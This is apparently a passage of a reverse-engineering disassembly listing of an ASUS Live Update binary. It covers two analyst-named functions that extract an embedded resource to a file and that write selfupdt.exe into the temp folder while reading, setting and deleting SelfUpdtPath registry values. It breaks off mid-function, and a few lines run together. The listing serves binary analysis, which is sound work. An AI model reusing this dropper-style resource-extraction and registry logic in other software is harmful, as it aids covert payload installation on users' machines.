;********************************************************************************************************
;* FUNCTION *
;********************************************************************************************************
;DWORD write_something(HMODULE rsrc_module, LPCWSTR filename, uint rsrc_name, LPCWSTR rsrc_type)
;rsrc_module HMODULE 4 ;XREF[1,0]: 00401875
;filename LPCWSTR 8 ;XREF[4,0]: 00401823,004018d6,00401916,0040194d
;rsrc_name uint c ;XREF[3,0]: 00401867,004019a7,004019c3
;rsrc_type LPCWSTR 10 ;XREF[1,0]: 00401840
;local_8 undefined4 -8 ;XREF[3,0]: 004018a2,00401932,0040195b
;local_c undefined4 -c ;XREF[9,0]: 0040182b,004018fe,00401919,00401936,00401943
; 00401968,00401986,0040199a,004019b6
;local_10 undefined4 -10 ;XREF[2,0]: 004018c1,0040190b
;XREF[1,0]: 004036ce
.text:00401810 55 PUSH EBP
.text:00401811 8bec MOV EBP,ESP
.text:00401813 83ec0c SUB ESP,0xc
.text:00401816 53 PUSH EBX
.text:00401817 56 PUSH ESI
.text:00401818 57 PUSH EDI
.text:00401819 6854d15100 PUSH .rdata:u_ExtractFile_0051d154 ;= u"ExtractFile\n"
.text:0040181e e85dfeffff CALL printf_wrapper2 ;undefined printf_wrapper2(wchar_t * ...
.text:00401823 8b7d0c MOV EDI,dword ptr [EBP + filename+0x4]
.text:00401826 8bc7 MOV EAX,EDI
.text:00401828 83c404 ADD ESP,0x4
.text:0040182b c745f8000... MOV dword ptr [EBP + local_c+0x4],0x0
.text:00401832 8d5002 LEA EDX,[EAX + 0x2]
LAB_00401835: ;XREF[1,0]: 0040183e
.text:00401835 668b08 MOV CX,word ptr [EAX]
.text:00401838 83c002 ADD EAX,0x2
.text:0040183b 6685c9 TEST CX,CX
.text:0040183e 75f5 JNZ LAB_00401835
.text:00401840 8b7514 MOV ESI,dword ptr [EBP + rsrc_type+0x4]
.text:00401843 2bc2 SUB EAX,EDX
.text:00401845 d1f8 SAR EAX,1
.text:00401847 0f8476010000 JZ LAB_004019c3
.text:0040184d 8bc6 MOV EAX,ESI
.text:0040184f 8d5002 LEA EDX,[EAX + 0x2]
LAB_00401852: ;XREF[1,0]: 0040185b
.text:00401852 668b08 MOV CX,word ptr [EAX]
.text:00401855 83c002 ADD EAX,0x2
.text:00401858 6685c9 TEST CX,CX
.text:0040185b 75f5 JNZ LAB_00401852
.text:0040185d 2bc2 SUB EAX,EDX
.text:0040185f d1f8 SAR EAX,1
.text:00401861 0f845c010000 JZ LAB_004019c3
.text:00401867 8b5d10 MOV EBX,dword ptr [EBP + rsrc_name+0x4]
.text:0040186a 85db TEST EBX,EBX
.text:0040186c 0f8e54010000 JLE LAB_004019c6
.text:00401872 0fb7c3 MOVZX EAX,BX
.text:00401875 8b5d08 MOV EBX,dword ptr [EBP + rsrc_module+0x4]
.text:00401878 56 PUSH ESI ;LPCWSTR lpType for FindResourceW
.text:00401879 50 PUSH EAX ;LPCWSTR lpName for FindResourceW
.text:0040187a 53 PUSH EBX ;HMODULE hModule for FindResourceW
.text:0040187b ff1568c45100 CALL dword ptr [->KERNEL32.DLL::FindResour...
.text:00401881 8bf8 MOV EDI,EAX
.text:00401883 85ff TEST EDI,EDI
.text:00401885 0f841c010000 JZ LAB_004019a7
.text:0040188b 6834d15100 PUSH .rdata:u_Found_resource_0051d134 ;= u"Found resource\n"
.text:00401890 e8ebfdffff CALL printf_wrapper2 ;undefined printf_wrapper2(wchar_t * ...
.text:00401895 83c404 ADD ESP,0x4
.text:00401898 57 PUSH EDI ;HRSRC hResInfo for LoadResource
.text:00401899 53 PUSH EBX ;HMODULE hModule for LoadResource
.text:0040189a ff156cc45100 CALL dword ptr [->KERNEL32.DLL::LoadResource]
.text:004018a0 8bf0 MOV ESI,EAX
.text:004018a2 8975fc MOV dword ptr [EBP + local_8+0x4],ESI
.text:004018a5 85f6 TEST ESI,ESI
.text:004018a7 0f84e3000000 JZ LAB_00401990
.text:004018ad 6810d15100 PUSH .rdata:u_Loaded_resource_0051d110 ;= u"Loaded resource\n"
.text:004018b2 e8c9fdffff CALL printf_wrapper2 ;undefined printf_wrapper2(wchar_t * ...
.text:004018b7 83c404 ADD ESP,0x4
.text:004018ba 56 PUSH ESI ;HGLOBAL hResData for LockResource
.text:004018bb ff1570c45100 CALL dword ptr [->KERNEL32.DLL::LockResource]
.text:004018c1 8945f4 MOV dword ptr [EBP + local_10+0x4],EAX
.text:004018c4 85c0 TEST EAX,EAX
.text:004018c6 0f84a6000000 JZ LAB_00401972
.text:004018cc 68ecd05100 PUSH .rdata:u_Locked_resource_0051d0ec ;= u"Locked resource\n"
.text:004018d1 e8aafdffff CALL printf_wrapper2 ;undefined printf_wrapper2(wchar_t * ...
.text:004018d6 8b4d0c MOV ECX,dword ptr [EBP + filename+0x4]
.text:004018d9 83c404 ADD ESP,0x4
.text:004018dc 6a00 PUSH 0x0 ;HANDLE hTemplateFile for CreateFileW
.text:004018de 6880000000 PUSH 0x80 ;DWORD dwFlagsAndAttributes for Creat...
.text:004018e3 6a02 PUSH 0x2 ;DWORD dwCreationDisposition for Crea...
.text:004018e5 6a00 PUSH 0x0 ;LPSECURITY_ATTRIBUTES lpSecurityAttr...
.text:004018e7 6a00 PUSH 0x0 ;DWORD dwShareMode for CreateFileW
.text:004018e9 6800000040 PUSH 0x40000000 ;DWORD dwDesiredAccess for CreateFileW
.text:004018ee 51 PUSH ECX ;LPCWSTR lpFileName for CreateFileW
.text:004018ef ff1550c45100 CALL dword ptr [->KERNEL32.DLL::CreateFileW]
.text:004018f5 8bf0 MOV ESI,EAX
.text:004018f7 83feff CMP ESI,-0x1
.text:004018fa 7451 JZ LAB_0040194d
.text:004018fc 6a00 PUSH 0x0 ;LPOVERLAPPED lpOverlapped for WriteFile
.text:004018fe 8d55f8 LEA EDX=>local_c,[EBP + -0x8]
.text:00401901 52 PUSH EDX ;LPDWORD lpNumberOfBytesWritten for W...
.text:00401902 57 PUSH EDI ;HRSRC hResInfo for SizeofResource
.text:00401903 53 PUSH EBX ;HMODULE hModule for SizeofResource
.text:00401904 ff1574c45100 CALL dword ptr [->KERNEL32.DLL::SizeofReso...
.text:0040190a 50 PUSH EAX ;DWORD nNumberOfBytesToWrite for Writ...
.text:0040190b 8b45f4 MOV EAX,dword ptr [EBP + local_10+0x4]
.text:0040190e 50 PUSH EAX ;LPCVOID lpBuffer for WriteFile
.text:0040190f 56 PUSH ESI ;HANDLE hFile for WriteFile
.text:00401910 ff1554c45100 CALL dword ptr [->KERNEL32.DLL::WriteFile]
.text:00401916 8b4d0c MOV ECX,dword ptr [EBP + filename+0x4]
.text:00401919 8b55f8 MOV EDX=>local_c,dword ptr [EBP + -0x8]
.text:0040191c 51 PUSH ECX
.text:0040191d 52 PUSH EDX
.text:0040191e 68c0d05100 PUSH .rdata:u_Wrote_%d_data_to_%s_0051d0c0 ;= u"Wrote %d data to %s\n"
.text:00401923 e858fdffff CALL printf_wrapper2 ;undefined printf_wrapper2(wchar_t * ...
.text:00401928 83c40c ADD ESP,0xc
.text:0040192b 56 PUSH ESI ;HANDLE hObject for CloseHandle
.text:0040192c ff1544c25100 CALL dword ptr [->KERNEL32.DLL::CloseHandle]
.text:00401932 8b75fc MOV ESI,dword ptr [EBP + local_8+0x4]
.text:00401935 56 PUSH ESI ;HGLOBAL hResData for FreeResource
.text:00401936 c745f8010... MOV dword ptr [EBP + local_c+0x4],0x1
.text:0040193d ff1558c45100 CALL dword ptr [->KERNEL32.DLL::FreeResource]
.text:00401943 8b45f8 MOV EAX,dword ptr [EBP + local_c+0x4]
.text:00401946 5f POP EDI
.text:00401947 5e POP ESI
.text:00401948 5b POP EBX
.text:00401949 8be5 MOV ESP,EBP
.text:0040194b 5d POP EBP
.text:0040194c c3 RET
LAB_0040194d: ;XREF[1,0]: 004018fa
.text:0040194d 8b450c MOV EAX,dword ptr [EBP + filename+0x4]
.text:00401950 50 PUSH EAX
.text:00401951 6870d05100 PUSH .rdata:u_Failed_to_create_file!_File_...;= u"Failed to create file! File name...
.text:00401956 e825fdffff CALL printf_wrapper2 ;undefined printf_wrapper2(wchar_t * ...
.text:0040195b 8b75fc MOV ESI,dword ptr [EBP + local_8+0x4]
.text:0040195e 83c408 ADD ESP,0x8
.text:00401961 56 PUSH ESI ;HGLOBAL hResData for FreeResource
.text:00401962 ff1558c45100 CALL dword ptr [->KERNEL32.DLL::FreeResource]
.text:00401968 8b45f8 MOV EAX,dword ptr [EBP + local_c+0x4]
.text:0040196b 5f POP EDI
.text:0040196c 5e POP ESI
.text:0040196d 5b POP EBX
.text:0040196e 8be5 MOV ESP,EBP
.text:00401970 5d POP EBP
.text:00401971 c3 RET
LAB_00401972: ;XREF[1,0]: 004018c6
.text:00401972 6838d05100 PUSH .rdata:u_Failed_to_lock_resource!_005...;= u"Failed to lock resource!\n"
.text:00401977 e804fdffff CALL printf_wrapper2 ;undefined printf_wrapper2(wchar_t * ...
.text:0040197c 83c404 ADD ESP,0x4
.text:0040197f 56 PUSH ESI ;HGLOBAL hResData for FreeResource
.text:00401980 ff1558c45100 CALL dword ptr [->KERNEL32.DLL::FreeResource]
.text:00401986 8b45f8 MOV EAX,dword ptr [EBP + local_c+0x4]
.text:00401989 5f POP EDI
.text:0040198a 5e POP ESI
.text:0040198b 5b POP EBX
.text:0040198c 8be5 MOV ESP,EBP
.text:0040198e 5d POP EBP
.text:0040198f c3 RET
LAB_00401990: ;XREF[1,0]: 004018a7
.text:00401990 6804d05100 PUSH .rdata:u_Failed_to_load_resource!_005...;= u"Failed to load resource!\n"
.text:00401995 e8e6fcffff CALL printf_wrapper2 ;undefined printf_wrapper2(wchar_t * ...
.text:0040199a 8b45f8 MOV EAX,dword ptr [EBP + local_c+0x4]
.text:0040199d 83c404 ADD ESP,0x4
.text:004019a0 5f POP EDI
.text:004019a1 5e POP ESI
.text:004019a2 5b POP EBX
.text:004019a3 8be5 MOV ESP,EBP
.text:004019a5 5d POP EBP
.text:004019a6 c3 RET
LAB_004019a7: ;XREF[1,0]: 00401885
.text:004019a7 8b4d10 MOV ECX,dword ptr [EBP + rsrc_name+0x4]
.text:004019aa 51 PUSH ECX
.text:004019ab 56 PUSH ESI
.text:004019ac 6898cf5100 PUSH .rdata:u_Failed_to_find_resource!_Nam...;= u"Failed to find resource! Name = ...
.text:004019b1 e8cafcffff CALL printf_wrapper2 ;undefined printf_wrapper2(wchar_t * ...
.text:004019b6 8b45f8 MOV EAX,dword ptr [EBP + local_c+0x4]
.text:004019b9 83c40c ADD ESP,0xc
.text:004019bc 5f POP EDI
.text:004019bd 5e POP ESI
.text:004019be 5b POP EBX
.text:004019bf 8be5 MOV ESP,EBP
.text:004019c1 5d POP EBP
.text:004019c2 c3 RET
LAB_004019c3: ;XREF[2,0]: 00401847,00401861
.text:004019c3 8b5d10 MOV EBX,dword ptr [EBP + rsrc_name+0x4]
LAB_004019c6: ;XREF[1,0]: 0040186c
.text:004019c6 8bc6 MOV EAX,ESI
.text:004019c8 8d5002 LEA EDX,[EAX + 0x2]
.text:004019cb eb03 JMP LAB_004019d0
LAB_004019d0: ;XREF[2,0]: 004019cb,004019d9
.text:004019d0 668b08 MOV CX,word ptr [EAX]
.text:004019d3 83c002 ADD EAX,0x2
.text:004019d6 6685c9 TEST CX,CX
.text:004019d9 75f5 JNZ LAB_004019d0
.text:004019db 2bc2 SUB EAX,EDX
.text:004019dd d1f8 SAR EAX,1
.text:004019df 8bd0 MOV EDX,EAX
.text:004019e1 8bc7 MOV EAX,EDI
.text:004019e3 8d7802 LEA EDI,[EAX + 0x2]
LAB_004019e6: ;XREF[1,0]: 004019ef
.text:004019e6 668b08 MOV CX,word ptr [EAX]
.text:004019e9 83c002 ADD EAX,0x2
.text:004019ec 6685c9 TEST CX,CX
.text:004019ef 75f5 JNZ LAB_004019e6
.text:004019f1 53 PUSH EBX
.text:004019f2 2bc7 SUB EAX,EDI
.text:004019f4 52 PUSH EDX
.text:004019f5 d1f8 SAR EAX,1
.text:004019f7 50 PUSH EAX
.text:004019f8 6808cf5100 PUSH .rdata:u_Invalid_argument!_Length_of_...;= u"Invalid argument! Length of each...
.text:004019fd e87efcffff CALL printf_wrapper2 ;undefined printf_wrapper2(wchar_t * ...
.text:00401a02 83c410 ADD ESP,0x10
.text:00401a05 5f POP EDI
.text:00401a06 5e POP ESI
.text:00401a07 33c0 XOR EAX,EAX
.text:00401a09 5b POP EBX
.text:00401a0a 8be5 MOV ESP,EBP
.text:00401a0c 5d POP EBP
.text:00401a0d c3 RET
;********************************************************************************************************
;* FUNCTION *
;********************************************************************************************************
;undefined drop_rsrc_and_execute(void)
;local_8 undefined4 -8 ;XREF[3,0]: 004034fe,00403518,004035ed
;local_10 undefined4 -10 ;XREF[2,0]: 004032c9,00403718
;local_14 undefined4 -14 ;XREF[2,0]: 004032c2,00403726
;local_52 undefined1 -52 ;XREF[1,0]: 00403308
;local_54 undefined2 -54 ;XREF[5,0]: 0040330f,00403345,00403374,00403385,004033c6
;local_25a undefined1 -25a ;XREF[2,0]: 00403475,00403669
;file_name wchar_t -25c ;XREF[7,0]: 0040347c,004034a0,004034b9,00403670,00403694
; 004036aa,004036c5
;local_462 undefined1 -462 ;XREF[2,0]: 0040345a,0040364e
;local_464 undefined2 -464 ;XREF[7,0]: 00403461,0040348b,00403499,00403655,0040367f
; 0040368d,004036e9
;local_c66 undefined1 -c66 ;XREF[1,0]: 0040353a
;local_c68 undefined2 -c68 ;XREF[6,0]: 00403546,0040355a,00403569,00403583,00403597
; 004035ad
;local_1466 undefined1 -1466 ;XREF[2,0]: 0040339f,00403422
;local_1468 undefined2 -1468 ;XREF[4,0]: 004033a6,004033ef,0040341c,00403425
;local_146c undefined4 -146c ;XREF[6,0]: 004032d2,00403318,0040333f,004033e9,004035a4
; 004035f9
;local_1470 undefined4 -1470 ;XREF[4,0]: 00403349,00403367,004033f6,0040340f
;local_1474 undefined4 -1474 ;XREF[4,0]: 00403322,00403338,004033b7,004033e2
;local_1478 undefined4 -1478 ;XREF[3,0]: 004032e8,004033dc,00403621
;local_147c undefined1 -147c ;XREF[3,0]: 004034f8,0040350a,004035dc
;local_1480 undefined1 -1480 ;XREF[3,0]: 004034ed,00403511,004035e7
;XREF[1,0]: 00403a43
.text:004032a0 55 PUSH EBP
.text:004032a1 8bec MOV EBP,ESP
.text:004032a3 6aff PUSH -0x1
.text:004032a5 6886ea5000 PUSH LAB_0050ea86
.text:004032aa 64a100000000 MOV EAX,FS:[0x0]
.text:004032b0 50 PUSH EAX
.text:004032b1 b870140000 MOV EAX,0x1470
.text:004032b6 e8d5550f00 CALL __alloca_probe ;undefined __alloca_probe()
.text:004032bb a170355600 MOV EAX,[.data:DAT_00563570] ;= BB40E64Eh
.text:004032c0 33c5 XOR EAX,EBP
.text:004032c2 8945f0 MOV dword ptr [EBP + local_14+0x4],EAX
.text:004032c5 53 PUSH EBX
.text:004032c6 56 PUSH ESI
.text:004032c7 57 PUSH EDI
.text:004032c8 50 PUSH EAX
.text:004032c9 8d45f4 LEA EAX=>local_10,[EBP + -0xc]
.text:004032cc 64a300000000 MOV FS:[0x0],EAX
.text:004032d2 8d8598ebffff LEA EAX=>local_146c,[0xffffeb98 + EBP]
.text:004032d8 50 PUSH EAX ;PHKEY phkResult for RegOpenKeyExW
.text:004032d9 6a03 PUSH 0x3 ;REGSAM samDesired for RegOpenKeyExW
.text:004032db 33db XOR EBX,EBX
.text:004032dd 53 PUSH EBX ;DWORD ulOptions for RegOpenKeyExW
.text:004032de 68d8d35100 PUSH .rdata:u_SOFTWARE\ASUS\ASUS_Live_Upda...;LPCWSTR lpSubKey for RegOpenKeyExW
.text:004032e3 6802000080 PUSH 0x80000002 ;HKEY hKey for RegOpenKeyExW
.text:004032e8 899d8cebffff MOV dword ptr [local_1478+0x4 + EBP],EBX
.text:004032ee ff150cc05100 CALL dword ptr [->ADVAPI32.DLL::RegOpenKey...
.text:004032f4 85c0 TEST EAX,EAX
.text:004032f6 0f851a040000 JNZ LAB_00403716
.text:004032fc 6888d35100 PUSH .rdata:u_opened_SOFTWARE\ASUS\ASUS_Li...;= u"opened SOFTWARE\\ASUS\\ASUS Live...
.text:00403301 e87ae3ffff CALL printf_wrapper2 ;undefined printf_wrapper2(wchar_t * ...
.text:00403306 6a3e PUSH 0x3e
.text:00403308 8d55b2 LEA EDX=>local_52,[EBP + -0x4e]
.text:0040330b 33c9 XOR ECX,ECX
.text:0040330d 53 PUSH EBX
.text:0040330e 52 PUSH EDX
.text:0040330f 66894db0 MOV word ptr [EBP + local_54+0x4],CX
.text:00403313 e8384a0f00 CALL FUN_004f7d50 ;int * FUN_004f7d50(int * param_1, by...
.text:00403318 8b8598ebffff MOV EAX,dword ptr [local_146c+0x4 + EBP]
.text:0040331e 83c410 ADD ESP,0x10
.text:00403321 50 PUSH EAX ;HKEY hKey for RegFlushKey
.text:00403322 c78590ebf... MOV dword ptr [local_1474+0x4 + EBP],0x40
.text:0040332c ff1508c05100 CALL dword ptr [->ADVAPI32.DLL::RegFlushKey]
.text:00403332 8b3504c05100 MOV ESI,dword ptr [->ADVAPI32.DLL::RegQue...;= 0015dbea
.text:00403338 8d8d90ebffff LEA ECX=>local_1474,[0xffffeb90 + EBP]
.text:0040333e 51 PUSH ECX ;LPDWORD lpcbData for RegQueryValueExW
.text:0040333f 8b8d98ebffff MOV ECX,dword ptr [local_146c+0x4 + EBP]
.text:00403345 8d55b0 LEA EDX=>local_54,[EBP + -0x50]
.text:00403348 52 PUSH EDX ;LPBYTE lpData for RegQueryValueExW
.text:00403349 8d8594ebffff LEA EAX=>local_1470,[0xffffeb94 + EBP]
.text:0040334f 50 PUSH EAX ;LPDWORD lpType for RegQueryValueExW
.text:00403350 53 PUSH EBX ;LPDWORD lpReserved for RegQueryValueExW
.text:00403351 68e4d25100 PUSH .rdata:u_SelfUpdating_0051d2e4 ;LPCWSTR lpValueName for RegQueryValu...
.text:00403356 51 PUSH ECX ;HKEY hKey for RegQueryValueExW
.text:00403357 ffd6 CALL ESI=>ADVAPI32.DLL::RegQueryValueExW
.text:00403359 8b3d20c45100 MOV EDI,dword ptr [->KERNEL32.DLL::GetTem...;= 0015bd14
.text:0040335f 85c0 TEST EAX,EAX
.text:00403361 0f8592020000 JNZ LAB_004035f9
.text:00403367 83bd94ebf... CMP dword ptr [local_1470+0x4 + EBP],0x1
.text:0040336e 0f8585020000 JNZ LAB_004035f9
.text:00403374 8d55b0 LEA EDX=>local_54,[EBP + -0x50]
.text:00403377 52 PUSH EDX
.text:00403378 6858df5100 PUSH .rdata:u_Detected_SelfUpdating_regist...;= u"Detected SelfUpdating registry k...
.text:0040337d e8fee2ffff CALL printf_wrapper2 ;undefined printf_wrapper2(wchar_t * ...
.text:00403382 83c408 ADD ESP,0x8
.text:00403385 8d45b0 LEA EAX=>local_54,[EBP + -0x50]
.text:00403388 50 PUSH EAX ;LPCWSTR lpString for lstrlenW
.text:00403389 ff154cc45100 CALL dword ptr [->KERNEL32.DLL::lstrlenW]
.text:0040338f 85c0 TEST EAX,EAX
.text:00403391 0f8e62020000 JLE LAB_004035f9
.text:00403397 33c9 XOR ECX,ECX
.text:00403399 68fe070000 PUSH 0x7fe
.text:0040339e 51 PUSH ECX
.text:0040339f 8d959eebffff LEA EDX=>local_1466,[0xffffeb9e + EBP]
.text:004033a5 52 PUSH EDX
.text:004033a6 66898d9ce... MOV word ptr [local_1468+0x4 + EBP],CX
.text:004033ad e89e490f00 CALL FUN_004f7d50 ;int * FUN_004f7d50(int * param_1, by...
.text:004033b2 681cdf5100 PUSH .rdata:u_SelfUpdating_key_length_>_0_...;= u"SelfUpdating key length > 0\n"
.text:004033b7 c78590ebf... MOV dword ptr [local_1474+0x4 + EBP],0x800
.text:004033c1 e8bae2ffff CALL printf_wrapper2 ;undefined printf_wrapper2(wchar_t * ...
.text:004033c6 8d45b0 LEA EAX=>local_54,[EBP + -0x50]
.text:004033c9 6810df5100 PUSH .rdata:u_3.3.4_0051df10 ;= u"3.3.4"
.text:004033ce 50 PUSH EAX
.text:004033cf e82cdcffff CALL FUN_00401000 ;undefined FUN_00401000(wchar_t * par...
.text:004033d4 83c418 ADD ESP,0x18
.text:004033d7 83f801 CMP EAX,0x1
.text:004033da 7506 JNZ LAB_004033e2
.text:004033dc 89858cebffff MOV dword ptr [local_1478+0x4 + EBP],EAX
LAB_004033e2: ;XREF[1,0]: 004033da
.text:004033e2 8d8d90ebffff LEA ECX=>local_1474,[0xffffeb90 + EBP]
.text:004033e8 51 PUSH ECX ;LPDWORD lpcbData for RegQueryValueExW
.text:004033e9 8b8d98ebffff MOV ECX,dword ptr [local_146c+0x4 + EBP]
.text:004033ef 8d959cebffff LEA EDX=>local_1468,[0xffffeb9c + EBP]
.text:004033f5 52 PUSH EDX ;LPBYTE lpData for RegQueryValueExW
.text:004033f6 8d8594ebffff LEA EAX=>local_1470,[0xffffeb94 + EBP]
.text:004033fc 50 PUSH EAX ;LPDWORD lpType for RegQueryValueExW
.text:004033fd 6a00 PUSH 0x0 ;LPDWORD lpReserved for RegQueryValueExW
.text:004033ff 68e4d45100 PUSH .rdata:u_SelfUpdtPath_0051d4e4 ;LPCWSTR lpValueName for RegQueryValu...
.text:00403404 51 PUSH ECX ;HKEY hKey for RegQueryValueExW
.text:00403405 ffd6 CALL ESI=>ADVAPI32.DLL::RegQueryValueExW
.text:00403407 85c0 TEST EAX,EAX
.text:00403409 0f85d1000000 JNZ LAB_004034e0
.text:0040340f 83bd94ebf... CMP dword ptr [local_1470+0x4 + EBP],0x1
.text:00403416 0f85c4000000 JNZ LAB_004034e0
.text:0040341c 8d859cebffff LEA EAX=>local_1468,[0xffffeb9c + EBP]
.text:00403422 8d5002 LEA EDX=>local_1466,[EAX + 0x2]
LAB_00403425: ;XREF[1,0]: 0040342e
.text:00403425 668b08 MOV CX,word ptr [EAX]=>local_1468
.text:00403428 83c002 ADD EAX,0x2
.text:0040342b 6685c9 TEST CX,CX
.text:0040342e 75f5 JNZ LAB_00403425
.text:00403430 2bc2 SUB EAX,EDX
.text:00403432 d1f8 SAR EAX,1
.text:00403434 0f84a6000000 JZ LAB_004034e0
.text:0040343a 6890de5100 PUSH .rdata:u_SelfUpdtPath_registry_key_ex...;= u"SelfUpdtPath registry key existe...
.text:0040343f e83ce2ffff CALL printf_wrapper2 ;undefined printf_wrapper2(wchar_t * ...
.text:00403444 83c404 ADD ESP,0x4
.text:00403447 68b80b0000 PUSH 0xbb8 ;DWORD dwMilliseconds for Sleep
.text:0040344c ff1524c45100 CALL dword ptr [->KERNEL32.DLL::Sleep]
.text:00403452 33d2 XOR EDX,EDX
.text:00403454 6806020000 PUSH 0x206
.text:00403459 52 PUSH EDX
.text:0040345a 8d85a2fbffff LEA EAX=>local_462,[0xfffffba2 + EBP]
.text:00403460 50 PUSH EAX
.text:00403461 668995a0f... MOV word ptr [local_464+0x4 + EBP],DX
.text:00403468 e8e3480f00 CALL FUN_004f7d50 ;int * FUN_004f7d50(int * param_1, by...
.text:0040346d 33c9 XOR ECX,ECX
.text:0040346f 6806020000 PUSH 0x206
.text:00403474 51 PUSH ECX
.text:00403475 8d95aafdffff LEA EDX=>local_25a,[0xfffffdaa + EBP]
.text:0040347b 52 PUSH EDX
.text:0040347c 66898da8f... MOV word ptr [file_name+0x4 + EBP],CX
.text:00403483 e8c8480f00 CALL FUN_004f7d50 ;int * FUN_004f7d50(int * param_1, by...
.text:00403488 83c418 ADD ESP,0x18
.text:0040348b 8d85a0fbffff LEA EAX=>local_464,[0xfffffba0 + EBP]
.text:00403491 50 PUSH EAX ;LPWSTR lpBuffer for GetTempPathW
.text:00403492 6804010000 PUSH 0x104 ;DWORD nBufferLength for GetTempPathW
.text:00403497 ffd7 CALL EDI=>KERNEL32.DLL::GetTempPathW
.text:00403499 8d8da0fbffff LEA ECX=>local_464,[0xfffffba0 + EBP]
.text:0040349f 51 PUSH ECX
.text:004034a0 8d95a8fdffff LEA EDX=>file_name,[0xfffffda8 + EBP]
.text:004034a6 6870de5100 PUSH .rdata:u_%sselfupdt.exe_0051de70 ;= u"%sselfupdt.exe"
.text:004034ab 52 PUSH EDX
.text:004034ac ba04010000 MOV EDX,0x104
.text:004034b1 e87addffff CALL printf_wrapper ;void printf_wrapper(undefined4 param...
.text:004034b6 83c40c ADD ESP,0xc
.text:004034b9 8d85a8fdffff LEA EAX=>file_name,[0xfffffda8 + EBP]
.text:004034bf 50 PUSH EAX ;LPCWSTR lpFileName for DeleteFileW
.text:004034c0 ff153cc45100 CALL dword ptr [->KERNEL32.DLL::DeleteFileW]
.text:004034c6 68e4d45100 PUSH .rdata:u_SelfUpdtPath_0051d4e4 ;LPCWSTR pszValue for SHDeleteValueW
.text:004034cb 68d8d35100 PUSH .rdata:u_SOFTWARE\ASUS\ASUS_Live_Upda...;LPCWSTR pszSubKey for SHDeleteValueW
.text:004034d0 6802000080 PUSH 0x80000002 ;HKEY hkey for SHDeleteValueW
.text:004034d5 ff1528c55100 CALL dword ptr [->SHLWAPI.DLL::SHDeleteVal...
.text:004034db e919010000 JMP LAB_004035f9
LAB_004034e0: ;XREF[3,0]: 00403409,00403416,00403434
.text:004034e0 6820de5100 PUSH .rdata:u_SelfUpdtPath_registry_key_no...;= u"SelfUpdtPath registry key not ex...
.text:004034e5 e896e1ffff CALL printf_wrapper2 ;undefined printf_wrapper2(wchar_t * ...
.text:004034ea 83c404 ADD ESP,0x4
.text:004034ed 8d8d84ebffff LEA ECX=>local_1480,[0xffffeb84 + EBP]
.text:004034f3 e8e8f0ffff CALL ATL::CStringT.text:004034f8 8d8d88ebffff LEA ECX=>local_147c,[0xffffeb88 + EBP]
.text:004034fe c745fc000... MOV dword ptr [EBP + local_8+0x4],0x0
.text:00403505 e8d6f0ffff CALL ATL::CStringT.text:0040350a 8d8d88ebffff LEA ECX=>local_147c,[0xffffeb88 + EBP]
.text:00403510 51 PUSH ECX
.text:00403511 8d9584ebffff LEA EDX=>local_1480,[0xffffeb84 + EBP]
.text:00403517 52 PUSH EDX
.text:00403518 c645fc01 MOV byte ptr [EBP + local_8+0x4],0x1
.text:0040351c e8dff9ffff CALL FUN_00402f00 ;undefined FUN_00402f00(CSimpleString...
.text:00403521 83c408 ADD ESP,0x8
.text:00403524 85c0 TEST EAX,EAX
.text:00403526 750a JNZ LAB_00403532
.text:00403528 68b8dd5100 PUSH .rdata:u_Unable_to_find_previous_vers...;= u"Unable to find previous version....
.text:0040352d e9a2000000 JMP LAB_004035d4
LAB_00403532: ;XREF[1,0]: 00403526
.text:00403532 33c0 XOR EAX,EAX
.text:00403534 6800080000 PUSH 0x800
.text:00403539 50 PUSH EAX
.text:0040353a 8d8d9ef3ffff LEA ECX=>local_c66,[0xfffff39e + EBP]
.text:00403540 51 PUSH ECX
.text:00403541 bb01000000 MOV EBX,0x1
.text:00403546 6689859cf... MOV word ptr [local_c68+0x4 + EBP],AX
.text:0040354d e8fe470f00 CALL FUN_004f7d50 ;int * FUN_004f7d50(int * param_1, by...
.text:00403552 83c40c ADD ESP,0xc
.text:00403555 6800040000 PUSH 0x400 ;DWORD nSize for GetModuleFileNameW
.text:0040355a 8d959cf3ffff LEA EDX=>local_c68,[0xfffff39c + EBP]
.text:00403560 52 PUSH EDX ;LPWSTR lpFilename for GetModuleFileN...
.text:00403561 6a00 PUSH 0x0 ;HMODULE hModule for GetModuleFileNameW
.text:00403563 ff1528c45100 CALL dword ptr [->KERNEL32.DLL::GetModuleF...
.text:00403569 8d859cf3ffff LEA EAX=>local_c68,[0xfffff39c + EBP]
.text:0040356f 6a5c PUSH 0x5c
.text:00403571 50 PUSH EAX
.text:00403572 e853480f00 CALL _wcsrchr ;wchar_t * _wcsrchr(wchar_t * _Str, w...
.text:00403577 83c408 ADD ESP,0x8
.text:0040357a 85c0 TEST EAX,EAX
.text:0040357c 7405 JZ LAB_00403583
.text:0040357e 33c9 XOR ECX,ECX
.text:00403580 668908 MOV word ptr [EAX],CX
LAB_00403583: ;XREF[1,0]: 0040357c
.text:00403583 8d959cf3ffff LEA EDX=>local_c68,[0xfffff39c + EBP]
.text:00403589 52 PUSH EDX
.text:0040358a 6850dd5100 PUSH .rdata:u_Data_to_write_to_registry_as...;= u"Data to write to registry as Sel...
.text:0040358f e8ece0ffff CALL printf_wrapper2 ;undefined printf_wrapper2(wchar_t * ...
.text:00403594 83c408 ADD ESP,0x8
.text:00403597 8d859cf3ffff LEA EAX=>local_c68,[0xfffff39c + EBP]
.text:0040359d 50 PUSH EAX ;LPCWSTR lpString for lstrlenW
.text:0040359e ff154cc45100 CALL dword ptr [->KERNEL32.DLL::lstrlenW]
.text:004035a4 8b9598ebffff MOV EDX,dword ptr [local_146c+0x4 + EBP]
.text:004035aa 03c0 ADD EAX,EAX
.text:004035ac 50 PUSH EAX ;DWORD cbData for RegSetValueExW
.text:004035ad 8d8d9cf3ffff LEA ECX=>local_c68,[0xfffff39c + EBP]
.text:004035b3 51 PUSH ECX ;BYTE * lpData for RegSetValueExW
.text:004035b4 6a01 PUSH 0x1 ;DWORD dwType for RegSetValueExW
.text:004035b6 6a00 PUSH 0x0 ;DWORD Reserved for RegSetValueExW
.text:004035b8 68e4d45100 PUSH .rdata:u_SelfUpdtPath_0051d4e4 ;LPCWSTR lpValueName for RegSetValueExW
.text:004035bd 52 PUSH EDX ;HKEY hKey for RegSetValueExW
.text:004035be ff1500c05100 CALL dword ptr [->ADVAPI32.DLL::RegSetValu...
.text:004035c4 85c0 TEST EAX,EAX
.text:004035c6 7507 JNZ LAB_004035cf
.text:004035c8 680cdd5100 PUSH .rdata:u_Set_SelfUpdtPath_registry_ke...;= u"Set SelfUpdtPath registry key\n"
.text:004035cd eb05 JMP LAB_004035d4
